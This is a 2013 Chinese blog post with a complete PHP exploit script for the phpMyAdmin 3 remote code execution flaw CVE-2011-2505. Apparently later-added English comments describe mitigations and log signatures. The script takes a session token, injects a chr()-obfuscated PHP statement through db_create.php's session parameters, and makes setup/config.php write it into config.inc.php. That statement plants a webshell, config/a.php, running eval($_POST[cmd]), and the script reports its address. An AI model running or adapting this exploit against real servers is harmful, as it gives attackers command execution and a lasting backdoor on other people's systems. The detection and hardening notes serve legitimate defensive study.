phpadmin3 remote code execute php版本exploit

发表于 2013-2-21 09:13:03
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。

首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
一是session.auto_start = 1;
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
于是写了这个php版本的exp,代码如下:
#!/usr/bin/php
<?php
/**
 * Proof-of-concept for CVE-2011-2505 (phpMyAdmin 3; CVE id taken from the
 * author's banner below). Read from the defender's side, the script spells
 * out one complete attack chain against an unpatched install:
 *   1. confirm that <path>/config/ is served by the target (the author's
 *      precondition: it must exist and be writable);
 *   2. obtain a phpMyAdmin session id and token from index.php;
 *   3. push a crafted ConfigFile/Servers entry into that session through the
 *      session_to_unset / _SESSION[...] query parameters of db_create.php;
 *   4. ask setup/config.php to persist the session into
 *      config/config.inc.php, which is expected to execute the smuggled
 *      statement when fetched;
 *   5. verify by fetching config/config.inc.php and looking for a marker.
 * Mitigations that break the chain: upgrade phpMyAdmin, and delete (or make
 * unreadable and unwritable) the config/ directory once installation is done,
 * which stops steps 1 and 4. Detection: web-server logs showing
 * db_create.php requested with "session_to_unset=" and "_SESSION[" in the
 * query string, followed by a POST to setup/config.php and GETs of
 * config/config.inc.php or config/a.php; file-integrity monitoring on
 * config/ catches the write itself.
 **/
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * working when the directory:"config" exists and is writeable.
 * (Author's precondition; it is also the primary hardening control: a
 * phpMyAdmin install without a live, writable config/ is not affected by
 * the file-write step below.)
**/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

/* Both are read by php_request() through "global"; $path must end in "/"
 * since it is concatenated directly with the resource name. */
$host = $argv[1];
$path = $argv[2];

/**
 * Try to determine if the directory:"config" exists
 * Step 1: the raw response (status line plus body) is searched for the
 * substring "404" anywhere; any other status is taken as "directory served".
**/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}

/**
* Try to get token and sessionid
* Step 2: the unauthenticated index.php response carries both the phpMyAdmin
* session cookie value ($resp[1]) and a token ($resp[3]); the regex pulls
* them straight out of the raw HTTP text.
**/
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=$resp[3];
$sessionid=$resp[1];
if($token && $sessionid){
    /* The two messages as posted read "tokentoken" / "Session IDsessionid";
     * presumably the variable interpolation was lost in the forum rendering. */
    echo "[+] tokentoken\n";
    echo "[+] Session IDsessionid\n";
}else{
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}

/**
* Try to insert shell into session
* Step 3 (the CVE-2011-2505 session-manipulation primitive): a GET to
* db_create.php carrying "session_to_unset" and a "_SESSION[...]" parameter
* writes attacker-chosen keys into the server-side session. The array key
* itself holds a PHP statement built from chr() calls and is bracketed by
* "*" + "/" and "/" + "*"; presumably that lets it escape a comment when the
* setup script later serialises the Servers array into config.inc.php --
* confirm against the phpMyAdmin 3 setup code. The chain therefore needs
* only the session cookie obtained in step 2, no login. This request line
* (db_create.php + session_to_unset= + _SESSION[) is the most distinctive
* log signature of the chain.
**/
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.

/**
* Try to create webshell
* Step 4: a POST to setup/config.php with submit_save=Save, authenticated
* only by the same session cookie and token, makes the setup script write
* the session's ConfigFile (including the poisoned Servers entry) to
* config/config.inc.php. This is why a reachable, writable config/ is the
* precondition.
**/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
/**
* Try to check if the webshell was created successfully
* Step 5: fetching the generated config file executes it server-side; the
* marker "t00ls" in the response is taken as proof, and the success message
* names the resulting file under config/. A GET of config/config.inc.php
* from the outside is itself anomalous and worth alerting on.
**/
echo "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
    echo "[+] Congratulations! Expoilt successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}

/**
 * Minimal hand-rolled HTTP/1.1 client used by every step of the script.
 *   $url    - resource relative to the script-level $path (e.g. 'index.php');
 *             it is concatenated verbatim, so $path must end with "/".
 *   $data   - urlencoded request body; any truthy value turns the request
 *             into a POST with Content-Type/Content-Length headers.
 *   $cookie - raw Cookie header value, sent only when non-empty.
 * Returns the raw response (status line, headers and body) as one string;
 * callers search it with strpos()/preg_match() rather than parsing it.
 * Reads $host and $path from the script's global scope. The connection is
 * plain TCP to port 80 (no TLS, port hard-coded) and the response is read
 * until EOF, relying on the "Connection: Close" header. A failed connect
 * prints a message and terminates the process.
 **/
function php_request($url,$data='',$cookie=''){
    global  $host, $path;

    // PHP truthiness: the default '' (and the string "0") means GET.
    $method=$data?'POST':'GET';

    // Request line uses the script-level $path as a prefix, not as a Host.
    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    // Fixed, dated User-Agent string -- a usable detection attribute.
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    // Close tells the server to end the stream, which is what the read loop waits for.
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data?$data:"";

    // Hard-coded port 80; no explicit timeout is passed to fsockopen.
    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
    // No trailing newline on the message; bare die exits with status 0.
    echo 'No response from '.$host; die;
    }
    fputs($fp, $packet);

    $resp = '';

    // Drain the socket until the server closes it; no length/chunk handling.
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}
?>